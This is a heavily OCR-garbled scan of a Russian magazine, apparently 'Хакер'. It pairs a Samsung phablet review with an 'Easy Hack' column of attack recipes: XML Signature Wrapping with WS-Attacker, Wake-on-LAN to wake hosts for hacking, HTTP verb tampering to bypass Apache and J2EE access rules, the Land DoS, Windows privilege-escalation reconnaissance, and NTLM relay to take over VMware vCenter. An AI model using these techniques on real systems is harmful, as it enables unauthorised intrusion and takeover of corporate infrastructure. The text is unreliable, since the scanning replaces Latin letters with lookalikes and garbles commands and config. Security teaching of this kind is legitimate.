Встроенная память: 16 Гб, поддержка карт 
тісгоБЭдо 64 гигабайт 

Экран: 5,5”, 1270 ж 800 точек, матрица НО Бирег 
АМОІ.ЕО 

ОС: АпЬгоісІ 4.1 плюс фирменная надстройка 
БатзцпдТоисМіг 

Интерфейсы: ВІиеЮоіЬ 4.0. ИРС, 05В ОТО 
Камеры: 8 Мп (основная), 1,9 Мп [фронтальная) 

Емкость батареи: 3100 мА • ч 
Вес: 180 г 

Цена: 29 990 рублей 



пригодилось устройство такого размера. 

Я пользуюсь Батзипд баіаху Мехиз с экраном 
в 4,7 дюйма, и надо признать, что по удобству 
хвата это лучший смартфон такого класса, 
и это признают даже некоторые мои знако- 
мые айфонщики. На большее я пойти не го- 
тов. Но я хочу разобраться. 

Похоже, что в Батзипд понимают, что такой 
форм-фактор не всегда удобен, и попыта- 
лись решить проблему — в первую очередь 
на стороне ПО. В настройках есть отдельный 
пункт, посвященный тому, что в 6М2 назы- 
вается «работой одной рукой». В частности, 
это меняет ориентацию клавиатуры — в за- 
висимости от предпочтений пользователя 
она начинает тяготеть к левой или правой 
стороне. То же происходит в интерфейсе на- 
бора номера. 

Тем не менее всей проблемы это не решает, 
ведь элементы управления обычных прило- 
жений никуда не деваются, и достать до них 
бывает тяжело. Кроме того, есть проблема 
с кнопками самого устройства — добраться 
до них, не перехватывая устройства, зачастую 
невозможно. Было бы здорово расположить их 
на боковой стороне устройства, но, вероятно, 
это могло бы вызвать проблемы у левшей. 

С другой стороны, расположение кнопок гром- 
кости ведь никому еще не мешало? 

При этом очевидно, что с практической точ- 
ки зрения форм-фактор 6Ы2 логичен. Не нужно 
носить с собой отдельный планшет. Не нужно 
платить за интернет на двух устройствах. 

Не нужно каждый день помнить, что надо 
поставить на зарядку оба устройства. Кстати, 
благодаря размерам у 6ІМ2 имеется батарейка, 



которая выдерживает почти два дня работы, — 
а это нереально круто. 

Но несмотря на всю привлекательность это- 
го симбиоза, пострадало удобство. Хоть и связ- 
ка из смартфона и планшета более громоздка, 
но эргономика каждого из устройств куда 
выше. В то же время есть ведь и люди, которым 
почти не нужен телефонный функционал, — 
активные пользователи чатов, 5М5, почты 
и веб-браузера. Те же самые люди жалуются 
всякий раз, когда производители 7-дюймовых 
планшетов блокируют работу «телефонного 
функционала» в устройстве. 



ОТ РУКИ 



В 6Ы2, как и в предшественнике, предусмотрен 
стилус (точнее, электронное перо) и механизм 
распознавания рукописного ввода. Стилус 
хорошо лежит в руке благодаря немаленькому 
размеру и довольно надежно крепится. В по- 
ставке есть несколько приложений для работы 
со стилусом, возможно вводить текст в любое 
текстовое поле. Распознавание работает 
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Я не смог удержаться 



Б РІаппег. Прочтите название вслух 



Опции естественного интерфейса 



Клавиатура в «одноруком» режиме 



на редкость хорошо — причем доходит до того, 
что оно само определяет язык ввода, без не- 
обходимости менять раскладку. 

Удобно ли пользоваться этим постоянно? 
Во-первых, текст точно нельзя набирать одной 
рукой. Во-вторых, на ходу этим тоже не зай- 
мешься. В-третьих, вытащить стилус — это 
дополнительное действие, и к нему придется 
себя приучать. Получается, что, хотя и распоз- 
навание нереально крутое, пользоваться этим 
каждый день, скорее всего, не будешь. 

Плюс возникает еще одна проблема, 
связанная с реализацией клавиш на передней 
панели. Если бы в Батзипд оставили стан- 
дартную панель с виртуальными клавишами, 
в них можно было бы тыкать стилусом. А вот 
с сенсорными кнопками трюк не пройдет. 

В общем и целом стилус оставляет впечат- 
ление игрушки, а не повседневного инстру- 
мента. Нарисовать шарж, послать написанную 
корявым почерком заметку — все это клево, 
но не более того. Единственный приходящий 
на ум юзкейс — подсвечивать участки доку- 
мента при просмотре. Но кажется, люди, кото- 
рым нравится так делать (вроде меня), просто 
распечатывают текст и берут маркер. 



ДЛЯ ТЕХ, 

КТО НЕНАВИДИТ ВАНИЛЬ 



В самсунговском ТоисЬѴѴіг изменений куда 
больше, чем, скажем, в НТС Бепзе, и они носят 
более фундаментальный характер. В этом 
плане у программистов Батзипд получаются 
противоречивые вещи. С одной стороны — 
видно, что они мыслят в верном направлении 
и пытаются решить реальные проблемы, 
и видно, что используется очень креативный 
подход. Чувствуется, что проделана огромная 
работа. Грубо говоря, не просто поменяли 
иконки. Но все эти надстройки подчас страда- 
ет недопиленностью и разрозненностью. 

Зачем было нужно заменять стандартный 
календарь на 5 РІаппег? Почему некото- 
рые приложения имеют минималистичный 
и аккуратный дизайн, а некоторые пропитаны 
скевоморфизмом и мультяшностью? Почему 
в стандартной поставке есть приложения, 
которым для того, чтобы обновиться, нужно 
скачать в браузере АРК-файл (вместо того, 
чтобы обновляться через боодіе РІау)? 



ДАВАЙТЕ ПОПРОБУЕМ 



В то же время есть и по-настоящему инте- 
ресные идеи, но многие из них имеют скорее 
экспериментальный характер и часто даже 
не включены по умолчанию. Особенно это 
касается инструментов естественного взаи- 
модействия — распознавания лица и голоса, 
которое популяризовано такими продуктами, 
как Бігі и Кіпесі. Стоит признать — хотя эта 
тема сейчас очень модная, никому еще не уда- 
лось выпустить что-то, что действительно 
можно было бы использовать каждый день. 

Приведу пример. Не секрет, что многие 
люди, когда пользуются голосовым управлени- 
ем, стараются говорить медленно и как мож- 
но четче. Тем не менее, как неоднократно 
объясняли разработчики и Арріе, и боодіе, 
системы распознавания рассчитаны именно 
на естественную речь и результаты становятся 
хуже, если пытаться подстроиться. Но ведь 
достаточно нескольких ошибок, чтобы ты ин- 
стинктивно начал говорить медленнее, — 
и работать становится уже неудобно. Именно 
поэтому, хотя с Бігі игрались все, каждый день 
им пользуются немногие. 

В Батзипд пошли дальше. Так, 6М2 может 
следить за лицом пользователя. Это позво- 
ляет взять в руки смартфон с выключенным 
экраном, и он покажет несколько индикаторов: 
почта, 5М5, пропущенные звонки и так далее. 
Прикольная идея, правда? Однако работает 
это далеко не каждый раз — все зависит 
от освещения. А иногда срабатывает и вовсе 
случайно. Соответственно, буду ли я поль- 
зоваться такой функцией вместо того, чтобы 
потратить долю секунды и нажать на кнопку 
для активации экрана? Едва ли. 

А вот пример удобного трюка: если при про- 
смотре 5М5 ты захочешь позвонить автору, 
достаточно просто поднести телефон к лицу. 
Другая фишка, также реализованная на смарт- 
фонах НТС и ВІаскВеггу, — если телефон 
лежит на столе, то во время звонка достаточно 
просто перевернуть телефон лицом вниз, что- 
бы перевести в тихий режим. Удобно и логично, 
хотя, наверно, физическая кнопка выключения 
звука (как на іРЬопе) еще удобнее. 

Любопытны жесты ладонью (в 6142 я стол- 
кнулся с ними впервые). Например, чтобы 
сделать скриншот, можно провести ребром ла- 



дони по экрану от края до края. Это логично — 
на любом устройстве, чтобы сделать снимок 
экрана, придется использовать две руки (ведь 
нужно сделать комбо «громкость вниз + кноп- 
ка выключения»). Однако возникает противо- 
речие с первоначальной идеей экранных 
жестов, которая опиралась на естественность 
управления. Поворачиваешь пальцы на кар- 
тинке, потому что инстинктивно тебе хочется 
ее развернуть. Жест ладонью же мало того 
что неестественен, так и выглядит странно. 

Нельзя не упомянуть 5 Ѵоісе, впервые 
представленный в баіаху 5 III. Надо сказать, 
что после появления боодіе ІМоѵѵ смысл в соб- 
ственном приложении Батзипд несколько 
потерялся. Однако у 5 Ѵоісе есть свои фишки, 
например возможность управления функци- 
ями смартфона — можно ответить на звонок 
голосовой командой, что удобно для автомо- 
билистов. Кроме того, активировать 5-Ѵоісе 
можно голосом, то есть вообще не нажимая 
ни одной кнопки. Впрочем, произнести «Ні, 
баіаху!» надо довольно громко и четко. Люди 
вообще-то пока стесняются разговаривать 
на улице с гаджетами, знаете ли. Тем более 
это все равно придется делать по-английски, 
что в России делает картину еще более 
странной. 

Если резюмировать, то в ТоисЬѴѴіг просто 
сумасшедшее количество функций и опций, 
но интеграция всего этого страдает. Тем 
не менее Батзипд нужно отдать должное 
за множество действительно необычных идей. 
Для следующей версии компании нужно во- 
оружиться бритвой Оккама и превратить свой 
полигон в готовый продукт. 



НА ЗАМЕТКУ 



Устройства типа «все в одном» всегда будут 
находить свою аудиторию хотя бы потому, 
что кажутся выгодным вложением и функ- 
циональным (читай, полезным) продуктом. 

В случае с 6И2 производитель пошел ва-банк, 
предложив максимальные характеристики 
и максимальное количество всевозможных 
опций. Но сама формула устройства пока не 
кажется законченной: требуется придумать 
что-то действительно необычное на стороне 
софта, чтобы этот формат не вызывал нарека- 
ний. Интересно, что будет дальше. х: 
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АВТОМАТИЗИРОВАТЬ ОБХОД ПРОВЕРКИ ПОДПИСИ 
В ХМЬ (ХМЬ ЗІбЫАТітЕ ЖКАРРІЫО) 



ЗАДАЧА 



РЕШЕНИЕ 

В прошлый раз я рассказал о том, что такое ХМ1_ Оідііаі Бідпаіиге 
и что за атака ХМІ_ Бідпаіиге ѵѵгарріпд (ХБѴѴ). Сегодня мы продол- 
жим тему, но уже в практическом ключе. 

Кратко напомню о технологии. ХМІ_ йБід позволяет соз- 
дать электронную подпись части или «целого» ХМЬдокумента. 

При подписи ХМЬдокумента в его начало добавляется заголовок, 
содержащий подпись. Проблема заключается в том, что заголовок 
с подписью использует для ссылки на ту часть, которая подписана, 
технологию ХРоіпІег (или аналогичную, например ХРаіЫ, а она, 
в свою очередь, не позволяет достоверно определить расположе- 
ние подписанного элемента в теле всего документа. 

Таким образом, ХБМ-атака в простейшем виде требует того, что- 
бы атакующий переместил подписанный кусок ХМ1_ в заголовок, 
а на его место подставил бы другой, интересующий его. Полу- 
чив такой документ, ХМЬпарсер возьмет подпись из заголовка, 
а также подписанный кусок, и тоже из заголовка, и в итоге подпись 
сойдется. Но, что хуже, в дальнейшую обработку пойдут данные 
от злоумышленника, так как они находятся в теле, а не в заголовке 
(см. рис. 1). Надеюсь, что ты вспомнил. 

Конечно, звучит это все очень просто и легко. На практике 
возникает приличная проблема. Хотя сама по себе она типична: 
несмотря на то что ХМІ_ 0516 и ХМ(_ вполне точные стандарты, раз- 
личных парсеров (на разных уровнях) много. К тому же здесь еще 
есть зависимость от работы самого приложения. Это все приводит 
к тому, что вариантов перестановок очень много. Например, воз- 




Рис. 1. Классическая Х5№-атака 

можно, «не прокатит» перенос легального тела в заголовок, а надо 
сделать два последовательно идущих тела, причем в правильной 
последовательности. Или надо для ХБѴѴ перенести легальное тело 
в тело интересующего нас... То есть вариантов много-много, и все 
необходимо тестировать. 

И вот потому прошу устремить твое внимание к чудесному 
«фреймворку». Название его — ѴѴБ-АПаскег І доо.дІ/дОЗѴУБ І, ав- 
тор— Кристиан Майнка (СЬгізІіап Маіпка). 

Несмотря на свою фреймворковость, тулза эта умеет делать 
пока только три вещи. Итак, пробегусь по модулям: 
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Атака 50АРАсІіоп5роо1іпд. Основывается на том, чтоБОАРпо- 
зволяетзадатьАсІіоп (то есть какаяоперациядолжна проводиться 
в приложении), как с помощью указания в Вос1у,такиспомощью 
заголовка (пример есть ниже в задачке про ѴМѵѵаге). Но последнее 
опционально. 

Атакажесостоитвтом, чтобы нарушитьпроцессавторизации 
засчетуказания какого-то другого Асііоп в заголовке. Наши права 
проверятся по команде из Восіу, а фактическое действие произво- 
дится из заголовка. Хотя, признаюсь, на практикеятакого не встре- 
чал. 

№5-А(Мге5$іпд БрооПпд. Эта атака основывается на технологии 
М/Б-Асісігеззіпд. Она позволяетзадавать«маршруты»для пере- 
даваемого ХМ ^документа. То есть мы можем указать, какому ХМ Ь 
сервису адресован документ, куда отсылать ответ, куда отсылать 
сообщения обошибках. Задаются маршруты простым добавлением 
ІІРІ_'ов. Так что это проще сделать ручками. 

Х51Л/. С помощью этого модуля мы почти полностью автоматизи- 
ровано можем определить вектор для ХБѴѴ-атаки. И это очень круто! 
Но так как модуль несколько не юзер-френдли, то я позволю себе 
расписать последовательность действий, необходимых для на- 
стройки ХБМ-модуля. 

1. ѴѴ50І_1_оас)ег-> Указываем 1Ж1_до атакуемого сервиса-» ЮАР. 

2. ЕхрегіѴіеѵѵ — ► вставляем украденный ХМ ^документ с валидной 
подписью (даже если время жизни, так называемый Тітезіатр, 
уже просрочено). 

3. В Теві ВециеБІ надо послатьтестовый запрос. 

4. РІидіп СопПд — ►БідпаІигеѴЛ/гарріпд. 

5. ѴѴ5-АиаскеганализируетвведенныйХМІ_-документи опреде- 
ляет все подписанные части. Чаще всего это Вобу и Тітезіатр. 

С последним ѴѴБ-АПаскег и сам знает, что делать. Но если нужно, 
в БЬоѵѵ можно указать, какая часть документа будет меняться. 

6. Далее самое главное — Ре)егепсе ЕІетепІ. Здесь мы должны ука- 
зать итоговый ХМЬдокумент, который нам необходимо внедрить, 
то есть нагрузку. Рекомендуется выбратьтакой, чтобы было по- 
нятно, что атака прошла, но при этом чтобы все не сломать. Цель 
ведь— определить «магическую» последовательность данных. 
Это обязательный этап. 

7. Иногда веб-сервис не плюется ошибками в случае некорректных 
запросов, а отображает ответ на изначальные (не подмененные 
данные). Так, например, ведетсебяфреймворкдля веб-сервисов 
СХР. И ѴѴБ-АКаскег по ошибке считает атаку успешной. Чтобы 
такого не происходило, необходимо указать в БеагсЬ уникальный 
текст, который должен быть возвращен только при успешной 
атаке. 

8. Аиаск0ѵегѵіеѵѵ->5іагІ. 

9. В поле Сопіепі отобразится итоговый запрос для проведения 
ХБѴѴ-атаки. 

Кстати, у \Л/5-Аиаскег версии 1.1 была проблема: в итогах выво- 
дился запрос для проведения атак, но без использованных схем, 
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Рис. 2. Пример настроек. Меняем Рауіоасі, сменив имя в запросе с Аппе на Ѵазуа. 
Добавляем поиск в ответе слова Ѵазуаѵѵ 




Рис. 3. Веб-сервис на базе СХР. Х51Л/ вынесения валидного Восіу в необрабатываемый 
элемент поддельного Восіу 



что очень удручало. Нормальный запрос можно было выискать, 
лишь только немного покопавшись в логах. Так что качай послед- 
нюю версию — 1.2. 

Еще из косяков стоит отметить то, что тулза за один запуск 
может быть натравлена только против одного веб-сервиса. Если 
указать ей другой, то она начинает подглючивать. А в общем — не- 
заменимая тулза получилась. 



УДАЛЕННО ВКЛЮЧИТЬ КОМПЬЮТЕР 



ЗАДАЧА 



РЕШЕНИЕ 

Ты, наверное, знаешь такую штуку, как ѴѴаке-оп-І_АІМ. Это борода- 
тая технология, которая позволяет удаленно включить какой-то 
компьютер, отправив по сети специальный пакет. Воттакое про- 
стое решение :). 

Оно нам может пригодиться, чтобы расширить скоуп того, 
что можно поломать в какой-то локальной сети. Подключились мы 
удаленно к корпоративной сети в выходные дни, а большинство 
хостов юзеров отключено. И тут мы возьмем и включим их, и по- 
хакаем всех :). 



Суть технологии заключается в том, что комп в выключенном 
состоянии продолжает питать сетевую карту. А та, в свою очередь, 
просматривает трафик в желании отыскать специальный пакет 
(тадіс раскеі). При этом сетевая карта не разбирает входящие 
пакеты по стеку ТСР/ІР, а просто ищет последовательность (тадіс 
раскеі). То есть она может быть инкапсулирована в любой протокол 
сетевого или транспортного уровня. Хотя чаще всего в качестве 
основы используется протокол ІЮР и порт 9 (иногда и 7). 

Важно еще и то, что сетевая карта в таком состоянии не имеет 
выделенного адреса и в качестве ІР в ІШР-пакете используются 
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ВЗЛОМ/ЕАБУНАСК 



широковещательные адреса. И как следствие, без специальной 
маршрутизации на сетевом оборудовании мы можем посылать 
ѴѴОЬ-пакеты только в сегмент, к которому подключены. 

Если же говорить о самом тадіс раскеі, то он вполне прост: 

1. шесть байт со значением «РЕ», как некий заголовок; 

2. шестнадцатикратное повторение МАС-адреса сетевой карты 
«получателя». 

Пример для хоста с МАС 01:02:03:04:05:06 — на рисунке. 

Вдобавок к этому на некоторых девайсах, поддерживающих 
ѴѴОІ_, имеется возможность добавить пароль (длиной до шести 
байт). 

Теперь поговорим об «атаке». Все, что нам нужно для включе- 
ния хоста, — знать его МАС (и иногда пароль). Если мы знаем про- 
изводителя сетевухи, то мы уже имеем на руках первые три байта 
и можно попытаться перебрать остальные три. Но все-таки лучше 
эти данные получить из других мест. Например, заранее проска- 
нировав по АВР или поснифав трафик. Из последнего метода мы 
также можем вытащить и пароль, так как он передается в откры- 
том виде. 

Для отсылки ѴѴОЬпакетов есть целый ряд всяких тулз. 

Но ѴѴОЬ-ЕхрІогег (авторства Натаниэля Карью — МаіЬапіеІ Сагеѵѵ) 
имеет ряд допфишечек и к тому же входит в ВаскТгаск 5 (/репіезі/ 
епитегаііоп/ѵѵоі-е). А потому пара-тройка примеров с ней: 

1. Запуск одного хоста: 

иоі-е.ру -т 01:02:03:04:05:06 -Ь 192.168.1.255 -р 9 -к 

2. Брутфорс МАС -адресов (первые байты берутся из ЬРтас.Із*) 
моі-е.ру -а 



моі-е.ру -5 -і еТЬѲ 

4. АКР-скан подсетки и определение Арріе-девайсов 
иоі-е.ру -Р 

Технология достаточно распространена. Думаю, что все со- 
временные стационарные компы поддерживают ее (точнее, под- 
держка нужна со стороны блока питания и мамки). Вопрос в том, 
разрешена ли она в БИОСе изначально... По слухам, во многих 
Арріе-продуктах включена. 



РРРРРРРРРРРР010203040506 

010203040506010203040506 

010203040506010203040506 

010203040506010203040506 

010203040506010203040506 

010203040506010203040506 

010203040506010203040506 

010203040506010203040506 

010203040506 



3. Сниф трафика (-з) В сети на МОЬ- пакеты и МОЬ- пароли Пример Мадіс Раскеі для \ѴОЬхоста с МАС 01:02:03:04:05:06 



ОБОЙТИ АУТЕНТИФИКАЦИЮ 

ИЛИ АВТОРИЗАЦИЮ (ѴЕНВ ТАМРЕКШОІ 



ЗАДАЧА 



РЕШЕНИЕ 

Многие веб-серверы имеют встроенные возможности разгра- 
ничения доступа. Простейший пример — это ограничить доступ 
админке (к директории асітіп). А при обращении к ней требо- 
вать от пользователя аутентифицироваться, используя Вазіс- 
аутентификацию. Большой плюс в том, что разграничение доступа 
реализуется только за счет возможностей веб-сервера. И не надо 
париться со скриптами, писать код какой-то... 

Кроме этого, опять-таки большинство браузеров позволяют 
еще внедрять контроль НТТР-методов (они же ѵегЬ). То есть можно 
ограничить доступ к какому-то объекту только по методу ОЕТ, 
а Р05Т — разрешить. Это добавляет еще больше возможностей 
с точки зрения конфигурации. Но, как это часто и бывает, порожда- 
ет целую прослойку конфигурационных уязвимостей. Что интерес- 
но, проблемы с настройкой несколько варьируются в зависимости 
от веб-сервера, и потому несколько классических примеров. 

Есть сервер приложений Э2ЕЕ, а в нем — ѵѵеЬ.хтІ со следующим 
содержанием: 

<зесигі1:у-соп5-1:гаіп-С> 

<\л/еЬ-ге5оигсе-со11есІ:іоп> 

<иг1-раРРегп>/агітіп/*</иг1-ра1:1:егп> 

< ІтСР р - те* ИосІ >СЕТ < / ЬРРр - шеТ НосІ > 

< НРРр - теТЬосІ > РОБТ< /ЬРРр - теТИосІ > 
</меЬ-гезоигсе-со11ес1:іоп> 



<аігЫі-сопз*гаіп*> 

<го1е-пате>ас!тіп</го1е-пате> 

</аи*И-соп5*гаіп-1:> 

</5есигі*у-соп5-Сгаіп*> 

Здесь все просто. Мы указываем, что доступ к директории асітіп 
разрешен только админам (о чем нам и сообщает указанная 
роль). 

Проблема, я думаю, ясна. Здесь также перечислены методы, 
которые запрещены (то есть используются Ыаскіізі-правила). 
Заметно, что методов «не хватает». Как минимум, админчик поза- 
был метод НЕАО (см. рис. 1). Это метод, по сути, эквивалент ОЕТ'а. 
С той лишь разницей, что сервер отвечает на него по-другому. 
Обрабатывает, но в ответ не посылает тело, только заголовок. 

Таким образом, мы имеем возможность обойти проверку 
веб-сервера и обращаться к сервлетам, используя метод НЕАО. 
Конечно, нам еще требуется, чтобы в этой директории мы могли 
сделать что-то «страшное», используя только НЕАО, но это уже 
совсем зависит от конкретного приложения. К тому же на нашей 
стороне еще и тот факт, что в яве ОЧЕНЬ часто сервлеты не раз- 
личают 6ЕТ и Р05Т. 

Пример номер два. АрасЬе + РНР. В нем валяется файл .Массезз 
с вроде бы нормальным ограничением на доступ только с опреде- 
ленного ІР (предположим, что это админский ІР). Остальные доступ 
получить не могут (см. пункт сіепу ігот аІІ). 
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Рис. 1. Три запроса: обычный СЕТ, НЕАй с ответом без тела и рандомный метод, 
обрабатываемый как 6ЕТ 



<І_ітіТ СЕТ Р05Т > 
огсіег с1епу,а11ом 
сіепу -Ргот аіі 
аііоіѵ -Ргот 192.168.0.1 
</1_іті*> 

Конечно, ты можешь тут сразу отметить, что отсутствует метод 
НЕАй. Но нет, это здесь не сработает, так как АрасЬе по умолчанию 
блокирует НЕАО, если 6ЕТ запрещен. 




Зато другие особенности нам помогут. Во-первых, АрасЬе, 
когда в конфигурационных файлах используется директива Ытіі, 
обрабатывает только известные ему методы запросов (6ЕТ, НЕАО, 
Р05Т, ТРАСЕ, РІІТ и так далее, полный список смотри здесь ЬЦ, 
Іѵ/150г22 ). Неизвестные методы он переправляет на уровень 
выше — приложению, обрабатывающему запрашиваемый файл 
(например, РНР). 

Таким образом, ограничения не действуют на эти кастомные 
методы. Но еще интересней второе. По умолчанию РНР, когда 
видит неизвестный ему метод, воспринимает и обрабатывает его 
как ЗЕТ. 

Обобщая сказанное, мы видим, что АрасЬе и РНР создают 
смесь, которая дает нам простую возможность обойти ограни- 
чения апача. Все, что требуется, так это обращаться напрямую 
к РНР-скриптам, используя нестандартный НТТР-метод (см. 
рис. 2). ѴѴеЬзсагаЬ или Вигр отлично подойдут для автоматической 
подмены метода. 



ЛОГИЧНЫЙ Р05 



ЗАДАЧА 



РЕШЕНИЕ 

Маленькая задачка про атаку «из дедушкиного сундука». Она 
сверхпроста, но прикольна в своей идее — для обучения правиль- 
ному ходу мышления. Название атаки — І_апгі. 

Суть ее в том, чтобы указать один и тот же адрес и порт (ІР 
нашей жертвы) в пакете. Таким образом, когда данный пакет 
попадет к жертве, она на него ответит, но при этом ответит сама 



себе. Итог — пакеты, которые так и не могут обработаться сетевым 
стеком, приводят к ОоБ'у всего хоста. 

Некогда эта проблема была во многих ОС и девайсах, включая 
ѴѴіпсіоѵѵб ХР и продукты Сізсо. Хотя и сейчас, я думаю, можно найти 
такие косяки в каких-нибудь етЬесІсіесі-устройствах или промыш- 
ленных контроллерах... 



ПОВЫСИТЬ ПРИВИЛЕГИИ В ѴѴІЫ00ѴѴ5 



ЗАДАЧА 



РЕШЕНИЕ 

Повысить свои привилегии в ѴѴіпсіоѵѵз и просто, и не очень. Все 
зависит оттого, как много и какое ПО стоит на хосте. То есть 
ѴѴі п сі оѵѵз из коробки, не считая каких-то программных уязвимо- 
стей, достаточно хорошо защищена. Но все мы живем и должны 
пользоваться софтом. Это и порождает проблемы конфигураци- 
онного плана. Об этом я сегодня и поговорю. 

Каждое ПО, когда устанавливается, вносит какие-то кор- 
рективы в ОС. И как ни странно, очень часто страдает безопас- 
ность, так как многих производителей ПО этот вопрос не очень 
волнует. 

Итак, что нам требуется для повышения привилегий? Найти 
места, через которые это можно сделать :). Можно либо ис- 
кать ПО и сервисы, которые имеют более высокие привилегии 
(то есть цели), либо сначала получить список всего, что нам 



вообще доступно (а точнее, его отличия от стандартной конфи- 
гурации). Оба способа имеют свои плюсы и минусы, как ты по- 
нимаешь. 

Несколько трудно обобщать, но искать надо примерно следу- 
ющее. Места запуска привилегированных процессов (сервисов) 
и процессов других пользователей; директории, которые доступны 
на чтение и запись; конфигурационные файлы, реестр — то есть 
все места, где возможно на что-то повлиять. Плюс не забываем про 
уязвимости, типа ОІ_І_-Ні]аскіпд (но об этом я уже писал). 

В любом случае одним из главных наших инструментов будет 
тулза от Марка Руссиновича — ассеззсЬк ІІесЬпе1.тісго5ои.сот/ 
еп-и5/5у5Іп(егпаІ5/ЬЬ842062.а5рх ). Она умеет отображать права 
для всех объектов в ѴѴіпсіоѵѵз и при этом фильтровать только инте- 
ресующие нас группы и юзеров. А это как раз то, что нам необхо- 
димо. 
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ВЗЛОМ/ ЕАБУНАСК 



Пример: 

ассеззсіік -мзи "изег" "СЛРго^гат РіІезѴ' 

• ѵѵ— искатьтолько доступ на запись; 

• 5 — включить рекурсию; 

• и— отключить выводошибок (удобно, когдау нас не полные права); 

• изег — имя пользователя или группы, для которой будут проверять- 
ся права; 

• "СДРгодгат РіІезѴ — путь к директории, откуда начнется проверка. 
Такжетутможноуказать ключ реестра, РЮ процесса (или *), имя 
объекта или сервиса. 



Так, следующие параметры должнытебе пригодиться: 

• с — проверятьправа ксервисам (*— для всех); 

• к— для поиска по ветвям реестра (название ветвей сокращен- 
ное, типа Ькіт); 

• р — проверять процессы (* — для всех); 

• о — проверятьобъекты; 

• ѵ — выводполной информации правдля конкретного юзера/ 
группы. 

Попробуй просканировать свою ОС, и я уверен, что результаты 
покажутся тебе очень интересными. Стоиттакже отметить, что про 
грамма плоховато работаете русскими названиями групп. 



ЗАХВАТИТЬ КОНТРОЛЬ 

НАД ѴМѴѴАКЕ ѴСЕЫТЕК (ЫТЬМ КЕІ.АѴ) 



ЗАДАЧА 



РЕШЕНИЕ 

Пару номеров назад я описывал в Еазу Наск новый модель 
для Меіазріоіі'а — универсальный МИМ геіау отѴѴеЬзІегзРгосІіду 
( доо.дІ/4дРІі ). Такого модуля давно не хватало МБР. МТ1.М геіау 
(БМВ геіау) как тип атаки — ого-го! И мощна, и гибка. А вот тулзы 
для юзания всей мощи не было. Теперь же в наших руках мощное 
оружие. Ну да ладно с похвалой... 

Как я и писал в прошлый раз, проблема кроется в самой ЫТІ-М- 
аутентификации, а потому уязвимыми продуктами являются все, 
что используют ее (и не используют каких-то дополнительных 
средств для своей защиты). И в подтверждение тех слов — данная 
задачка. 

Есть такая вещь, как ѴМѵѵаге ѵСепІег — система централи- 
зованного управления ЕБХі-серверами и виртуалками на них. 
Поломать ее — лакомое дело, ведь мы можем «выдрать» из нее 
привилегированные доменные креды и получить привилегирован- 
ный доступ ко всем виртуалкам. То есть в общем случае поовнить 
ѵСепІег равняется поовнить всю корпоративную сеть. Алексей 
Синцов в одном из номеров писал о нашем опыте, о том, как это 
можно сделать на основе найденных им уязвимостей. Он, конечно, 
маг и волшебник в поиске уязвимостей :). 




Рис. 1. ИТЬМ-аутентификация в ѵСепІег 



Но сейчас немного о другом, о «неисправимом». Вообще, 
и ѵСепІег, и ЕБХі серверы (и, вероятно, другие) построены в сво- 
ей основе на одной платформе. Для общения с ними (не считая 
веба) нужно использовать специальный ѵБрЬеге СІіепІ. Но если 
посмотреть на передаваемые данные, то мы увидим, что по сути 
это обычный веб-сервис, использующий в качестве основы 50АР. 

То есть можно написать и свой клиент для управления. Во-вторых, 
у продуктов ѴМѵѵаге по умолчанию имеется поддержка М/іпсіоѵѵз- 
аутентификации. А это в простейшем и основном случае стандарт- 
ная МТІ_М-аутентификация. Но и это еще не все. ѴСепІег под вин- 
дой в качестве основы для разделения прав использует доменных 
пользователей. Это все ведет к тому, что мы можем очень просто 
и легко проводить атаку типа ІМТІ.М геіау. 

И для этого дела я написал ІЧТІ_М геіау модуль для МБР под 
ѴМѵѵаге ѵСепІег — приводящий или к обходу аутентификации (если 
повезло админу), или к полной компрометации всей инфраструк- 
туры. 

Не могу не описать самой атаки в простейшем виде. 

Итак, у нас есть: жертва-админ, мы — хакеры и ѵСепІег-сервер. 
Мы находимся в локальной сети с жертвой. 

1. Мы заставляем браузержертвы (ІЕ, например) зайти на наш веб- 
сервер— модуль МБР. 

2. Наш модультребуету браузера аутентифицироваться по МИМ. 
Так как мы находимся в одной сети, то жертва может обратиться 
к нам по короткому доменному имени (типа Мр://Ьаскег/ІаІаІа), 

и потому ІЕ автоматом попробует аутентифицироваться по МИМ, 
«не теребя» жертву вопросами. 

3. ІЕ посылает первый МИМ -пакет с именем жертвы и общей инфой 
(всевВазебД). 

4. Мы его пихаем в тело БОАР-запроса и отправляем на ѵСепІег. 

5. Сервер возвращаетна БОАРответссЬаІІепде (рандомная строч- 
ка) для МИМ и куки — ѵтѵѵаге_5оар_5ез5Іоп. 

6. Мы пересылаем І\ІТІ_М-пакетссЬаІІепд'ем нашейжертве. 

7. Жертва хеширует свой хеш и сЬаІІепде и отправляет нам его. 

8. Мы это переправляем на сервер. 

9. Сервер нам говорит, что все ОК и мы аутентифицированы! 

Все просто, как видишь. Здесь главное — чтобы у админчика 
были права в ѵСепІег. 

Но что дальше? Да, мы аутентифицированы. А точнее, аутен- 
тифицированы куки, которые нам сервер назначил при подклю- 
чении. Но мы же не можем выполнять операции! Дальше есть два 
варианта. Первый — воспользоваться модулем ѵтѵѵаге_5ез5Іоп_ 
гіеіеіег, который входит в комплект ѴА5Т0 ( ѵазІо.піЬЫезес.ого ). Этот 
модуль — прокси для ѵБрЬеге СІіепІ. Если указать ѵБрЬеге СІіепІ 
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Хакерские секреты простых вещей 



Сіаийіо Сгізсіопе 



Вазіс орсіопз: 

Иате Сиггепс Зессіпд 



Кедиігей Оезсгірсіоп 



Ргохіез по 
КН05Т 172.16.0.199 по 
ЯРОЙТ «43 по 
ЗОАРЮ 0Ю40С31-564Е-4511-АСОО-О57ЕЕА571Е4Е по 



Чзе а ргоху с^аіп 
ТЬе гетосе Ьозс. 

ТІпе гегюсе роге. 

Т'пе ЗСАР зеззіоп ІО со из 



е. 



ЗЯѴНОЗТ 0 . О . О . О 

ап асісігезз оп сЬе Іосаі тасЬіпе ог 0.0. 0.0 
ЗКѴРОКТ 9999 
ЗЗЬ сгие 

55ЬСегс 

із гапйотіу депегасей) 

ѴНОЗТ 



Тіпе Іосаі Ьсзс со Іізсеп 



уез 

уез 



ТЬе Іосаі роге со Іізсеп 
Цзе ЗЗЬ 

РасЬ со а сизсот 35Ь сегс 



НТТР зегѵег ѵігсиаі Ьозс 



Оезсгірсіоп: 

ТЫз тойиіе ѵ;і11 аііоѵ; сЬе іп^ессіоп оі а діѵеп ЗОАР Зеззіоп Ю апсі 
изаде ѵісЬ сЬ.е VI сііепс. Озе Ьураззте аз изегпате ог раззѵогй со 
ассіѵасе . 



ѴМ\л/аге ѵ5рЬеге* 

СІіепІ 



I 



